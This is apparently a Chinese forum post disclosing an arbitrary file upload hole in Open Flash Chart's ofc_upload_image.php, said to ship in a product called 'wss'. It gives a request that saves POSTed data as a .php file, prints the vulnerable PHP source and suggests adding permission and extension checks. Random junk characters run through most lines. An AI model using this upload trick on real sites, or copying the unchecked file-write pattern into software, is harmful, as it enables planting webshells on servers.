POST 数据漏洞文件执行任意后缀文件保存, |* Z- S; Z3 K' A8 V# g
漏洞文件/chart/php-ofc-library/ofc_upload_image.php9 ?3 w* Y, r* j8 t! d
0 r1 [3 @( u* n: ]6 w* f/ c4 f1 @利用:; X$ F2 d0 K H, e! w3 H
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
* F6 Q/ i: [) h, H; ^6 `& e4 r# e
Post任意数据
6 B J( s0 F% b8 I3 F% Y+ M! ~保存位置http://localhost/chart/tmp-upload-images/hfy.php
1 H5 X3 K' B2 I7 A& `' l/ } B! l/ _+ T
|0 _. ^9 ^! b5 \最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
: [$ t l) K1 ^5 a* x
]7 k6 Y' G7 W! o1 S1 C- B. r# T<?php
' N# ~( s1 z, N: z [' l' W# W; q+ v7 l7 [" ~% P( @9 I c. i
//1 o3 E, _* f& l! R) R
// In Open Flash Chart -> save_image debug mode, you
: v; n& W0 m! H& s1 c// will see the 'echo' text in a new window.
0 ^6 f4 O! f0 C1 [//
' Z6 b: |2 T: c% c4 p& `4 D7 z% b$ }: z# x% C9 ^% ]4 I
/*
, ?4 P) N- `/ r3 A! E- g& X3 O. G Q
" B* U# L+ l3 }5 L9 pprint_r( $_GET );: e1 e3 D% U/ U4 Y. s: v
print_r( $_POST );
9 ]. q! F3 W+ b- P* U0 d' s; @& ^print_r( $_FILES );5 n! P3 I' s1 ?: D; O7 ]3 L
. d+ j2 Y# O0 H# b, }print_r( $GLOBALS );* U! C9 I# L' S2 `
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );5 G% S8 L7 W3 K6 K/ Q0 @8 z8 E
5 C9 i) \. }$ f; N+ z
*/
( {9 U+ J! h5 Y* E$ u, n, F// default path for the image to be stored //6 {" w& I* v6 _1 w
$default_path = '../tmp-upload-images/';
# r) S3 k" e% ~ e" L! W9 ]' I' \& r) F2 J
if (!file_exists($default_path)) mkdir($default_path, 0777, true); {- k% B& D, {% x2 S+ _: V- J
; O+ i0 J: p, y5 ]
// full path to the saved image including filename //
5 J& ~0 `# f( n* v$destination = $default_path . basename( $_GET[ 'name' ] ); * ~5 o7 {- V8 y' J' R: `( f
# ^8 d+ O; f8 k( E: mecho 'Saving your image to: '. $destination;
1 q2 w/ o) M0 D// print_r( $_POST );
. l8 p; Y4 l9 N8 A% @3 q, h// print_r( $_SERVER );
6 ]9 M! ]7 \! f$ A4 N6 E: M// echo $HTTP_RAW_POST_DATA;
+ y' v$ H; s% i* \1 d, n% ~$ U; b& s, c; }5 E9 `2 b
//0 y" u7 ^! ^' L
// POST data is usually string data, but we are passing a RAW .png$ }8 B" G$ C+ {
// so PHP is a bit confused and $_POST is empty. But it has saved
+ Y' R- x5 q( W+ D7 w// the raw bits into $HTTP_RAW_POST_DATA
$ j' k4 A' Q1 H, q2 D5 S) P( v//
2 N3 z( U$ u6 h, g7 `' m% L# m' U, q) I7 ?) l" y, A, }. k: N. D1 `: V
$jfh = fopen($destination, 'w') or die("can't open file");
3 D9 @4 @. I1 f4 b2 T5 jfwrite($jfh, $HTTP_RAW_POST_DATA);
; U0 V) G/ t1 u2 e# Bfclose($jfh);5 R& O) G1 ?9 B2 z. e) U
/ W% I) H1 Y$ ^, R* N; x, W7 x
//
' } _ H3 {5 j, P b. t// LOOK:) Z. ]4 v3 ~. b# ~4 o
//8 O8 `: c1 T- |; S7 t; U
exit(); o5 ]9 e. b& j9 K; H
//0 \8 u9 K- S( F `/ n: h5 k- L4 ^+ d
// PHP5:$ _+ u! l2 l4 O$ X' {- C0 o
//
2 t2 R9 c+ k: m) O& j6 k' _
1 ^2 o. U, b' C! o* T( P
0 I0 T, M" l+ H// default path for the image to be stored //! d! [2 n( u3 d, y
$default_path = 'tmp-upload-images/';
+ U# n& d; p! l3 Z
. ^; f7 Z* G$ I, e" Q; [if (!file_exists($default_path)) mkdir($default_path, 0777, true);, D8 c" C2 H( a
- U8 B/ T. |7 k5 q; o% N// full path to the saved image including filename //
: n! d' T* E) w& Z0 Y$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
( K& r P! D8 u' K. n- V2 `2 ^) G i: p# T
// move the image into the specified directory //
: T! {5 S2 L0 |3 W- Iif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
4 v' Z3 Z8 R+ [0 v a echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";6 p7 ~5 Z$ @) }3 E
} else {" t9 I$ s( h( d! W& q
echo "FILE UPLOAD FAILED";
7 k3 v6 \. `* k1 } c}
& Z9 W% o' J, K+ q" S
) O! R) P u7 y2 U- ]8 `8 h# u) s0 u) G, K; d
?># X+ u' @; n8 W- T
% U$ [5 m. e$ j5 C; V! O7 U x! ?' K: H% A2 A1 _) A7 M* m
+ h% V: }$ b: C5 p4 k- L) K& @" t0 o, c& L% S0 H* D
+ O. G0 n/ E, u2 j
3 I ^ Y6 q& j4 _修复方案:
; a1 F* V% e% R0 y: i. O! l这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 ' l( {( R" B; A; C9 W+ x/ i, o6 `
9 [/ z9 N- z* ]2 }& Q+ P/ }1 W/ v4 P) _8 L# L
1 J1 Q5 \- |5 @. G, x' e. N
: {2 r/ t7 x# w/ q |
发表于 2013-2-23 12:38:58
收藏
支持
反对